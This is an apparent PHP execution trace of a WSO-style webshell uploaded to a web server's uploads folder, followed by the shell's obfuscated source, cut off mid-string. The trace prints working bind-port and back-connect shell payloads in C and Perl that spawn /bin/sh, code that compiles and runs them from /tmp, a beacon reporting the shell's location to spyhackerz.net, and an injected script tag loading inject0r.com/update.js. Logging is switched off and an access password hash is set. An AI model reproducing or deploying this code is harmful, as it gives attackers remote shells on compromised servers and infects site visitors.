NCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; \r\n $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; \r\n ?> \r\n <h1>Network tools</h1><div class=content> \r\n <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> \r\n <span>Bind port to /bin/sh</span><br/> \r\n Port: <input type=\'text\' name=\'port\' value=\'31337\'> Password: <input type=\'text\' name=\'pass\' value=\'wso\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>"> \r\n </form> \r\n <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> \r\n <span>Back-connect to</span><br/> \r\n Server: <input type=\'text\' name=\'server\' value=\'<?=$_SERVER[\'REMOTE_ADDR\']?>\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>"> \r\n </form><br> \r\n <?php \r\n if(isset($_POST[\'p1\'])) { \r\n function cf($f,$t) { \r\n $w=@fopen($f,"w") or @function_exists(\'file_put_contents\'); \r\n if($w) { \r\n @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); \r\n @fclose($w); \r\n } \r\n } \r\n if($_POST[\'p1\'] == \'bpc\') { \r\n cf("/tmp/bp.c",$bind_port_c); \r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c"); \r\n @unlink("/tmp/bp.c"); \r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &"); \r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>"; \r\n } \r\n if($_POST[\'p1\'] == \'bpp\') { \r\n cf("/tmp/bp.pl",$bind_port_p); \r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &"); \r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>"; \r\n } \r\n if($_POST[\'p1\'] == \'bcc\') { \r\n cf("/tmp/bc.c",$back_connect_c); \r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c"); \r\n @unlink("/tmp/bc.c"); \r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &"); \r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>"; \r\n } \r\n if($_POST[\'p1\'] == \'bcp\') { \r\n cf("/tmp/bc.pl",$back_connect_p); \r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &"); \r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>"; \r\n } \r\n } \r\n echo \'</div>\'; \r\n printFooter(); \r\n} \r\nif( empty($_POST[\'a\']) ) \r\n if(isset($default_action) && function_exists(\'action\' . $default_action)) \r\n $_POST[\'a\'] = $default_action; \r\n else \r\n $_POST[\'a\'] = \'SecInfo\'; \r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) \r\n call_user_func(\'action\' . $_POST[\'a\']); \r\n?> \r\n<div id="cot_tl_fixed"><marquee>Private Shell - Wireless crew © Copyleft 2009 -Pro_Wikileaks </marquee></div> \r\nHacker-newbie.org </marquee></div>' /var/www/html/uploads/refo1.php(4) : eval()'d code 1 0
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 2 $zx = 'localhost'
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 3 $wx = '/uploads/refo1.php'
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 4 $site = 'localhost/uploads/refo1.php'
4 20 0 0.011792 969856 file_get_contents 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 5 1 'https://spyhackerz.net/save.php?url=localhost/uploads/refo1.php&id=7821718728974864923874'
4 20 1 0.160117 971728
4 20 R ''
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 5 $check = ''
4 21 0 0.160288 971560 curl_init 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 9 0
4 21 1 0.160322 972472
4 21 R resource(5) of type (curl)
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 9 $curl = resource(5) of type (curl)
4 22 0 0.160353 972600 curl_setopt 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 10 3 resource(5) of type (curl) 10002 'https://spyhackerz.net/save.php?url=localhost/uploads/refo1.php&id=7821718728974864923874'
4 22 1 0.160373 972696
4 22 R TRUE
4 23 0 0.160386 972472 curl_setopt 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 11 3 resource(5) of type (curl) 19913 TRUE
4 23 1 0.160402 972568
4 23 R TRUE
4 24 0 0.160415 972472 curl_exec 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 12 1 resource(5) of type (curl)
4 24 1 0.538907 972504
4 24 R ''
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 12 $check = ''
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 22 $linr = 'ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luam'
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 23 $winr = 'VjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs='
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 24 $min = 'base64_decode'
4 25 0 0.539012 972584 base64_decode 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 25 1 'ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luamVjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs='
4 25 1 0.539034 972728
4 25 R 'echo "<SCRIPT SRC=http://inject0r.com/update.js></SCRIPT>";'
4 26 0 0.539064 973144 eval 1 'echo "<SCRIPT SRC=http://inject0r.com/update.js></SCRIPT>";' /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 25 0
4 26 1 0.539083 973144
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 35 $auth_pass = 'e48e13207341b6bffb7fb1622282247b'
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 36 $color = '#00ff00'
3 A /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 37 $default_action = 'FilesMan'
4 27 0 0.539127 972696 define 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 38 2 'SELF_PATH' '/var/www/html/uploads/refo1.php(4) : eval()\'d code(1) : eval()\'d code'
4 27 1 0.539145 972800
4 27 R TRUE
4 28 0 0.539159 972728 strpos 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 39 2 'python-requests/2.25.1' 'Google'
4 28 1 0.539174 972800
4 28 R FALSE
4 29 0 0.539188 972728 session_start 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 43 0
4 29 1 0.539261 973480
4 29 R TRUE
4 30 0 0.539276 973480 error_reporting 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 44 1 0
4 30 1 0.539291 973520
4 30 R 0
4 31 0 0.539304 973480 ini_set 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 45 2 'error_log' NULL
4 31 1 0.539320 973552
4 31 R ''
4 32 0 0.539333 973480 ini_set 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 46 2 'log_errors' 0
4 32 1 0.539347 973552
4 32 R '1'
4 33 0 0.539359 973480 ini_set 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 47 2 'max_execution_time' 0
4 33 1 0.539375 973584
4 33 R '30'
4 34 0 0.539388 973480 set_time_limit 0 /var/www/html/uploads/refo1.php(4) : eval()'d code(1) : eval()'d code 48 1 0
4 34 1 0.539402 973544
4 34 R FALSE
3 19 1 0.539421 974976
2 7 1 0.539433 863504
1 3 1 0.539440 860200
1 35 0 0.539448 860232 Error->__toString 0 Unknown 0 0
2 36 0 0.539460 860312 Error->getTraceAsString 0 Unknown 0 0
2 36 1 0.539472 860568
2 36 R '#0 /var/www/html/uploads/refo1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/refo1.php(4): eval()\n#2 {main}'
1 35 1 0.539492 864704
1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/refo1.php(4) : eval()\'d code(1) : eval()\'d code:49\nStack trace:\n#0 /var/www/html/uploads/refo1.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/refo1.php(4): eval()\n#2 {main}'
0.540620 784184
TRACE END [2023-02-13 01:08:07.769454]
Generated HTML code
<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;"><?php
$UeXploiT = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUHHMM8iLN64IyMnPDEkN0kQ\x431g\x41\x3d";
$An0n_3xPloiTeR = "\x3d4Ne/Ss\x63yJH\x42mrmewO7Y\x41t8H/D\x61On\x63TX\x2bV\x41H/4\x625NX/\x62\x415VZJ0kYh\x2b\x42P\x42/2\x63ZO9DwFk31Hj3ZxV8j\x61FlkHIiO6l\x430W/4/qyHTzlULnnZTIgDW9l4FqJ\x634dj\x42jN7v81wfY\x61OYdNw3\x62NYjsvTP\x62vKm\x62gXuq\x41x52\x42Vs\x41vYOHG6mUY4Eu\x61LrgOEmVxU7\x63PZVOF\x62/Xu76t6\x42dG3WmxG\x42kSpgNI6iIj6rnLUSdpYql\x43YO5dk\x62O7Ez7J6OyqdOPr\x62R\x43u\x61eUwFzv\x62fIr3\x62\x2bHL8HStvik7MY1DmSRv7SRvz\x437Dvfk6dW/I3r8hl0FvKTQlw1i\x637SPyQpLySuLy3dtg1PtMq\x2bKwnJ5Ql0Rk\x63Dj\x61\x410GNLtZTsQ\x63zPDF\x43TDv504L\x2bIX2UurFMKUyQhsy\x62keiV\x2bry3\x61Q\x63L1wVV\x63QnI\x61Xjmm7tR4xexrXVLKOy\x62MLKH\x42jz4SIMls\x61QiqYZIDmkny\x43VQWWl1Rs6qoUgg5jtn8XJ\x61L\x2b\x61V1tRGZ1M9oo69G4E8MtDzYFL3G/IHK1wd3T8Rxyy\x42YpP\x62\x2bFyFoy3\x41G\x61eXp2dd9JP17qnD1p\x412T\x61\x41WvnpxkXH\x63zSPG/1ls4m5e4E5fl1JKFK1X7x2u6I2\x2bJs\x63\x62VStY3\x414HKqTLeIFHq\x62lrTzMp9q7mp9WZS7hpn2HX/nJ9tqsyh3d0\x2bu\x6343fPd/OxY\x61\x424h\x61\x42PJj5pg6hGpRST\x41ENfL3gFHo9\x63e59RFYRHo9qwzGj\x42i8UXKH1/ET53d0J\x61q\x42JQoI44dqW4R65DZpq6lK1k\x61rX2s2nrDV\x61o\x2bGFWe\x634yt4o\x63l0h\x61/t6q\x62eVL3hoIlY\x620nfdD90ZqJiZweLQJ49\x43ZTj1rE\x422VIF2j0pTYMq\x41wsEXUtVYwWhl\x613LF/xE4od3E2F\x63T1j\x61mrKtOK\x61Pm\x2bVP59X0WrK00VLXS5iM8xo99s9EwvesGpZDRDM5973\x42v8Mz\x43\x2b6\x42XIgeGPiqLm\x624N8Ll3ih/Z3nwrXijvT7w9ff9Udu/uHe97r/guQve8Uq7Wiv/\x2bxLvtZJtD\x62SXujR7R58Hvq23Wd5rX\x62Nk33LpJ/8yrn1wenf7odM\x41jX9fPd6fPt0Fyg8/wf5Sj\x62nW\x2bJ6iweoOz1UiY\x43jv8sdDx\x41Szp8/ntg3\x41Nk8Nnyjw\x43nw\x633gdu/wPfXu7I\x62/fg2e6zdz\x2bY9\x613v3O\x62fqqe4z\x2bhlNf5WMED5sjjj6p3\x2buLNtNML\x43f3PPj\x41\x2b\x41Z5Tykf\x637WJQTVzhUEDn3N\x429YfYZxgyDnV20YS3df2p3T/HD8Rv\x62IKfjw9nd\x430\x61uKfXe6unlfQv\x2b5r7v7D\x614\x4346\x2b\x63\x41ijwe2FqMi1jW3p/r\x42sI9g4s\x62\x43W4S8s\x43u733nv5FHpwvXe/8rHetGMD\x2bfYq3\x2b4e\x42JzmM4wI6z2JPLYv\x41096472/0d3Zno\x42wwy0\x2btwQF5xH6Ft9w5//XSkZmX0R5hH1kHe8wOf/KszvEfPNJM8JX\x43UzRk\x2bwk3O4njTsz0pn8pzd2q3Y\x2b1v\x2bm5MF\x63jFtm\x632n9G6VZP\x42R\x62w2yhuISoIGRsynLq2X8j/Ph3f\x63uh\x427xRvr6d7u59hw\x63Wt942GzkEh3ZsnTO/yeP\x62TwfhfHWVG\x2b/8tz\x2bMjeihQE\x41t\x62\x2b\x2bJ34e7YyNeV3H\x415DTvh742qoRZxtP2UM1DQ\x2bWzmLDwZDxx7/f/iDfkFkG5oRH5IjVHexVvuIwm2dohR2nMkhe61\x62nG/eV\x63/1Znvf\x42m6T\x2bevx3WNv4Lz7N79nUkffT7eO9Rs5rQ\x43MFYNu2m\x2bLTYwfP4t7v\x2bf\x63\x2bWwTfohPu8pWO9\x2b9X\x62fwtzPO/7L8\x63vxNM\x615x\x63qOM4T9GKN\x63NUr5Hd4N\x42391KHe2V\x61/5\x628DSrHTUG13PEW\x419uDQf\x62km\x41\x42P9yZ\x61\x2by\x2bR\x429\x429OE6sk8EEEmtNgT3wNd\x63k3\x61oFrL0TT8\x61fwf25P\x63ZyoPk\x438pv\x41H2Z\x2b8f/Yn4oJE\x41fQTKW5nTw2Ne8lH8\x2bN8\x2bg\x41i7n73P1JI\x41\x43HUIV3z6WjQfS/d\x62877fV03RxenS243LpRHeyV3\x61DHNdwdTv75wU\x633fYx\x42\x2bIRoSgeGvMyljje0FzfEwFGH0\x2bXn\x635L4LH8owD\x63gv778917frjEU\x63h\x62OL3188\x2b1tn\x63phs3h5Qqj\x42\x41Ie\x43SOPgQi\x42Nyef6\x42kI4vTjs77pD3fngh5ug4p39QjleQU/D7qL/RDZ7VP6WtVmZL7w9t83dHlg9\x62\x43t\x63Q\x2bh\x61dRX7hGvzv8\x2b\x62N\x41\x2bIEqMQPtt\x2bhp07/\x2bldhtseEdtu7l7v9VzgXi2Mey\x61tY4\x42ivT\x417fouE4nm7\x2b/OIP81zx9L5L4Xq5zUf75zwVd\x2besF\x2b\x2bROIvZ0j\x616gPw9\x412O9x3v8ijM3HHldUv/y3ffDyZNh2onj\x419N7mnQ0igHyu\x6136No\x62TOvx9Xv\x61wIN1Dg47vf4tOf/0IzmzNnxPefrfEDtPN/yo\x6288Z0tzurZsvz1XN\x2bxTv\x2b4Vr\x628Lvf\x62X\x4374\x618umf5Z\x62f5jeQr\x41NXvtjKG2Hg33v/R7e8DwffS8\x43HxxFnwN4i\x437kZ89Tu\x2bvWLxnd/4HGeWYMhhvw4n9ONf1E61Luf9q/v\x63gN\x61Kon2\x62\x424s\x2b1Gy53vJW\x6286kJ\x61/Tt320H\x42yt8697H\x2b8S\x42\x2buWu\x2butvhn3dyNZg\x42Dy5X1z\x61Qjj4Rh77uM/\x2bTXdzDQg3fwVm0U\x62Gzv2\x41MfwXiO\x6198PQf\x62vdE/\x2b7F\x6379E3dsDN\x2bq7v\x62\x2bD7O8mf/m3Ghr0fD6Dd5wHWwG\x2by\x62Xo3n9G0XwXu1W\x42tZ59Y\x41H1rK8JNY\x63/\x2b\x627QP6i/Lt\x2bi/od\x2bN\x41289GfRPZ\x62t\x610XO\x429rr7f39D6Hn98\x423N9/IZoDp5h8\x2b\x42\x2bhJv8i72f2W35Xn7\x63geORfi/\x2bFpP\x2byt\x2bw\x41l2XX\x2bKxe0Y2\x2b8Fu/hG8d3K\x63Sl\x628h\x61\x2b6\x2bn38e7f\x2b\x2b9v\x6101ffSDrr9P\x2b697v/2\x61\x2b2V\x62rh92/5\x41v/l73/\x2b5D\x623jO5tIu\x41OGu\x62/\x62g\x2b0M\x2bH1zlnNPDRZ\x4176N7e89j\x2b1go\x2bk1ed/Qvv/i3MeKdjv3s99Lq/TtZ3L25ToxTu\x63z3W54H\x2bk\x42w9dFMDQZL9xtvRYq/2pXe\x2bxXPf7Dg6oj\x621\x626/\x41gL9\x43\x2b/vX\x41L/4\x633Y9XTrHZLve8t75\x62svMyG8ZDk3vfnzvfq8gyLudD7dd6u6ufyDeG\x41oPpu9uJv\x61/jqxHd8ln4gD\x2botwyPeD\x616wt\x2bYwxXe3ZnrjvP64rflXnUff6O/x\x42I0zvkx3d\x42K8zf0Gr\x63\x43e\x62gd\x2bGr2s7wD389mwPeKPp\x2bQTmfTE/3F\x612tx73u1KX/2QXMj/eu\x2bff4prO5zDHq/vSyzXe2om5wP/uG3\x2bidO5\x2bnfXz3u1\x62HoQ26ZL30fnjMuxLJYWJX8JvdP02tT\x62E585ZP\x2b\x41HvHitI2r\x63LpKNfyHQwm\x63R\x2bwPvKIw9EnyFdv\x63ULIQhhHnnRh4E4nsW1lnd3RK8yXvezSOQqsw5gelKImjX5VssKm6pZ5wu\x43zFe\x42zIhr8gs1Xmu00lLR48SUx4vHdI\x2b8pVy\x62OV0X\x42i9jZFinWEWwThZU5\x2bNK7o\x41\x41i3MmQK32oU5mgTv\x42idGHDwgz9xEjLk\x63r\x436X2ewdWTf7OYeR\x61\x61VntvrmxSlDo8r330o9eZSi\x2bwup\x61Fu\x43YRqfk0R95uiTJ\x2bnRWJw3Vo2uHKIgi34J\x61xTdk\x2bfR5\x41dn7Yi\x2bS\x43DWg\x435WfD54TMsKv4VZztR\x42\x43eJMl8jKKTjiWR2\x61htf1keJyS/XNtJEw0yP\x42u62MHkWp\x41/DY6xNtrsWUMdD8ie\x43S62Quf\x61o3SXfr\x62t5tupPD\x63i2\x2b5GZWTH5\x42wHy\x62YPqN\x63nSl9R7Uoz9l\x43tt\x61pIyFEz1iIpU\x615eZ\x61MEG\x2bJqRp\x62qKP0KgRu4JzyZQ\x41Dx1UpKGF8Ns\x43hRURO\x2bvIdJ5PREKnXqSx\x41X42WNizhtZ\x42\x2bWEIrWGQlpJen\x43Oqnyvo\x41x5f7\x43rrrSSli\x421VmkI5ogpRPDN7KgeHmPSUmTNfO\x42XeL2\x61Zsk6FZzgn\x42I54ol1fmL54m\x42Uyd\x42MTTM\x437xL3MEDL\x63jqm21SN\x42kIV\x63/JplXlf\x43Lpi9zJg6pY\x42w/nXYTFh9G\x62Xe5Nk\x61Kv3lPu8qUeW1\x2bUJn0\x61P\x43gxVsZWXFSuzZyhdxMKiOi\x42vdz\x42\x637KZiN1sqsh\x61Uodo\x41txLZH\x43\x61erwFog/J0\x62\x61fwHz4UFp4tYovLnjg7\x42/iK\x62\x62X2x7rD62wqr\x42vTP4N6g\x43VJVxWQerEZggkd\x2b\x61sEdnXNq\x2bSxDyIDrDq/G2s0\x42RL17\x61zyswir24P\x2b\x2bp/urlM/FpwE6p\x616UT6dT\x414454FSJnmtU\x62s\x61XSIzJUf\x43hILjT\x61\x62\x63\x43P/KN4RuiWhuGKrRIREeO8xJSMoM5zXJqy\x41jru1q\x63e6DtfuvnF\x63U/09IJtrV9kJST\x42\x61FvJ05z\x625yiVh\x43n\x622YyKoh\x42LVEqYQuZDg3rkVn9uRKIM\x62L62VW8JTVDdIk\x61QnXN94yLWes7Yhrq/U5e\x62v/lj7q1T/ThU\x2b\x632Rp\x43ZHhe0JOFGRrIFykspujSmi\x41\x62JvqgGDQrfEpLFodek7sTSwSuWpNDURmki4dzTnO92y7p\x42eYpK\x63XGs\x41DHoZRH\x62ONF85JYGW\x61xg8PmIkIOiTkPFXE5oiTdrfYJp/fM6wI/5\x421\x63\x61T\x63EYUi\x62P\x61\x2b5fiK9R/\x2bO/e\x42\x2bfy80EL0TMwG/PWtl\x43t4R/\x43hjTOyHF/\x62\x2blPo7Ff84G\x2bO68\x2bYdf\x2bYSLW8\x61XZfv4p\x41L\x62G\x43jVuRIEz1Ok3\x63lGtnXp\x43iOivizW4UttUV9Oz\x61M18tiMLYwWWEnWZJl\x2b9ukTyN\x2bDMGtujnlUPzoVyXorF\x62nkMxk5qkYOqg/gXHJRok\x63\x2bWN0i\x42iVpF2Kg50FDmx\x43r2dIDVy\x42XTgvpNZTwMzMxX5zP\x61msKy7nYIWpuekvjTHvYP2xF86HWjfy\x63pFQJw\x63RjXx9KxjdmQf3\x2bdzSqpfgIpTGW5YJZ8Ljw87YtutU2qSN\x63ELhmyrjF6t8YZHo8dhsIUQi\x41nrSf94ZN\x42DILYE2FsHTRM/8\x42v\x433Qrwrt8xLv/kv\x41Zjv9GgRZDemS9qR5tdV\x42wUTzRYDxTRqeqr5T\x62dTLoxuODUdRvQ\x42dOhWdiHYV7ofm0ZQNSY\x61x\x431DKj6\x62mRjRgEluiWzpi7z5LpIiY8xNOqxR0\x419XzJWSKZotJG\x2bHgKi08rnqm\x62NifFRW\x42SuXiUNW9u\x41rMOdgdvole\x43VX3\x43Jd3fFvE\x41d0MRE6dLk5\x418Fo\x42L6tdk6rI23ikZmV\x430mslUu\x43pZinvhM\x62JwqxelXZh5L\x62r3y0nQ\x611\x43I5\x62O3QsqPqSQW4jnE\x41\x61RHKpH\x61o/\x62kqQw2O2s29l8Qg\x62t\x63H\x43um31\x42oDR93SpHQrJ\x61UT\x61HRsJJ9smQtw\x2b5tFlWvKptqVWpTYwWJy3JwUmkNNMsMEVX\x2bSns\x43\x434LSrwPJkhv986Z/Wgz\x42r6vRWLI8RF12SK\x41KiyDQIY81\x42z9xRFP\x61XzY\x619K3gPYGz95X\x429QpOS4K8DHdGYF5l\x61\x419\x63Vn9TuHVY3IUh\x62qR8v\x433F\x2b\x427ExIeonm\x2bJ\x41NjXNqG1wPL8IF1Y7wrpYs4HfI4y1pplU\x41hg6Vy\x43g7dZfU\x62S\x41fouFvPWTIxYE5g\x41\x42Kg\x62ljF0hdnLH\x2bQfNSxtD\x41Q\x2b7V\x62LVL\x62\x41x\x42/GJPX96h/Ej\x61e3t0fl3PJDz\x62W4DD6\x43XKn09YxwgOvxj\x63/58v1qmSnl0vlnr\x2bIr0uHTOkYRUYY\x41Up2/VLe9tnkhZtrLq\x63T4mSrl8dGDWtolSXxy\x63fv5Knnunu7tvMl2GWx\x61viZV\x2bn\x2bIi1vqfYxTTXiH6\x2blOP2z\x62pYEmOQHyNtEG\x41MQP0p\x61q16efFImxkGR/n1O3usoJq\x43\x42dLefVqiLLtOMwV/dENGnDyl9kO7\x2bgJ1yyySpYoLJY/j0m\x61YPyIHoSR8Fuj\x623\x41pFG\x63HL/OHsrZu3kwwdpl02foIL58\x43jPq8/\x61qmQH9\x429vKf8Ep4d4p7e8wXu\x43WWk3fH\x63R\x41\x41iDI\x41Wys\x2bjyykyTk\x4270jT\x615GGQh\x61\x426n\x43N\x42rZ9IX\x2bZ89\x62E/dO8ijT1NOMw4nM2\x63OpgfiPKjmDSF\x62E2qup\x42D9j2\x61k7J\x62WIZZs\x633OlnWO\x420NwwDMzHkpGp\x2bX0M9Xr\x61HEPRwR8/hmlI\x2bQQdPu/i02g6f2uenV\x42LRL2miq\x61tnDl\x63o53pQ4gSns9hpE6zUGe3SgVGm5Fd95UGL\x42xJTl5kLW\x41g0\x42vznkokMSxzpG\x62l\x42sFp1lExvW4G\x62uvSfWp21RHe3J\x62glL\x2b9\x61liiKV7D6PFU2nku\x2bppQxf\x61e\x2b7/gz\x4386\x41hK/\x2b2en\x427wiTy\x62PjP9qT3Nq\x63y2DhD\x43\x2b4h\x41Tx/WxU\x62fJESW\x41k\x2bQDWySP9vRSswonMrPE1\x2bE4X9jTYjG1uUWJGKEvGU8urG/gdH1F3o4VW2Vx6n\x61ZKM51UlGXwfifMS/WqWlYwpQwY\x2bzr\x63J\x43NkpksXJrPH/OF8TT4t\x62neNtMzeY4iIRZZ/SYg\x2bYkU4GW0kZXrfMvVuQW\x2bTyXD/5Op/pO48un\x63xO\x41vqI1d593RXLJUKMKeTZqM2PJYkZlXsG7w/o6O4FSmUgtgxk4OISS2dyvwtEPKM/\x2b5G\x62KGfL\x42\x62\x41TTw\x41M8LNIz9r14q0r0/\x62EI\x43QxkjNK0yZ3QXPIhwJHFpldSQrGvIPogfg446nkZsrMlTNOyGGhDins\x42z4QGXzwuWfYIdd\x42JzkVszhx2QSPpyN\x42s\x631srzsV2ow9iESn/\x62uOgOLEe\x63/8qGD7\x43/KS\x2byjN\x63ult\x42\x63X65dKh6FmNKluwiiMvM3y\x61Wi9FpsOrQP9Vsyx9mp6Ij\x63\x42ODReEsQ/W93\x42lWOpy\x2b2lSXwTh4Jd3GkRVHJ5kTsMF4/Skq8dMluPHFo6z\x2b4FEu7WTiLR/nfZ9pX5fK\x43jFhuHtu1V\x63eNIxVJ87iYLM\x633mjjX\x61JgTRptlOK\x63LEPo\x2bwSPTfU\x61HLji3IRVJTMtFmjt/n\x61M4Yfr46206\x62/\x420lX/jwJvM\x2bk\x41k3rIyzz\x41\x63u\x2b2ZuNiqJj\x62V\x42JiIRi\x42iOfOQ8SXwimJjJLMnnnwTtMxuSI\x61zFYYKv\x43/GW/3W0Qp4NxVINo0uOFXH\x43pMu7SQq2Si3Zkmo6MG\x438ouEgzi6\x43\x62xsZh\x438mY1\x41SNKy\x63\x61\x2bQwMn\x62ONgY\x41f\x616J2OM3pQPg\x41ILr0/14lv1\x2bI5XirgmFlQQnEuM/JtLmnQwO\x41eJQpZtetYziql/R\x62Q7iz3\x2bLyKqQl\x42\x61Nw6O7dmKXSufYltnkPvX0NZRZV4VSMtJrzqYnj\x43\x438fdDKfhI/0wEOXu0T\x41yPLrzi\x42ldp1\x42\x2b3hJU\x42rKPr\x42vJY\x42nm/9HOQexioX0\x43NnQsglTeI6M065\x2bwPmt3Vz2tt\x2b5XO1uQwQ4rMiX/mz12DSzr3Qzy8L2\x42fOnljerqKQW3Op\x41E62R3\x43JGFE3lzkoXrjVmVUW8SV60Svk4DD9ZTKe\x63yXkfFImL1\x41fmF1jpf4lUU\x616G5fdM\x4267\x2bl\x63\x41idojn5V4vd4F\x41\x2bXJdRtZkuI87UhqFk\x41qw9xf84P\x63E\x62kl3xq\x63SZG\x2bUyYMPQphO\x41JOn\x63XzLTTvdZQ3Od78gYsRO30SuZ2wOeMnpkJiKT\x63s00DJuqrq2d3W\x2b/\x61DTJYP15tV\x618xls6ZZYzYwq\x420tTQNo\x2bLx\x42ZQorpm2J3/\x63y\x6218zPG\x2bZ\x41r\x628/44ilVX4zFkNRk/6PpX6Y3I69V\x41gD\x63x8H\x6390\x41\x42JhVQ6ssMw\x2beQ8esJmq4OXDgXLn0Oeo2qtlz\x62FF/dyMeV\x43\x2bF6ypr4YVwRJI2FPt1lX8soq\x2bF21GUgrLPrmy7uF/j6ulyLpYeKp99\x42\x61\x63N5PO\x63S4mpfFkRWZTiqw\x636ELHGD\x42\x43Vh\x42eLdYV\x2b8\x63vXGZ53\x42pMu9\x62ro37of\x62\x2b\x43t\x62KMuko2s8W\x63Xk1LUDQ8QjxdIklWn9NE\x617o\x43Y54R0px\x43dT2JiPMDl9GsxWP\x42dRTw7Sgx\x61tVgx\x43kFtKJeFs7\x41yn\x63\x615V\x41Zj8sjrzYrP2Eo1VoG\x6371hJz\x41khevtRty\x43vXI\x61WE3v\x439\x2bgN3Iqu2\x415L0D\x2b\x63L43D\x43TNynMujV\x2boZr6\x43V\x63fPJ2gGtWuj/2pDli3YQX5\x43207K2\x41wDKE7SgHnje\x2bz4hfoVoYVWmrk\x2b2\x61phHhJlZ1HjoSEP\x43xw1vDqrG3\x62\x62mpsE3P\x62Rp3EYmw\x4196PxOne\x42Ks3dZujh\x2bs7xP\x63NUYZVk/vzojw8Z\x2b\x63\x433\x63NQDdqogg\x419JS77xMhFDf7Z\x2b\x43kd4NyLX\x42spsDuLoNf8ES0Fy\x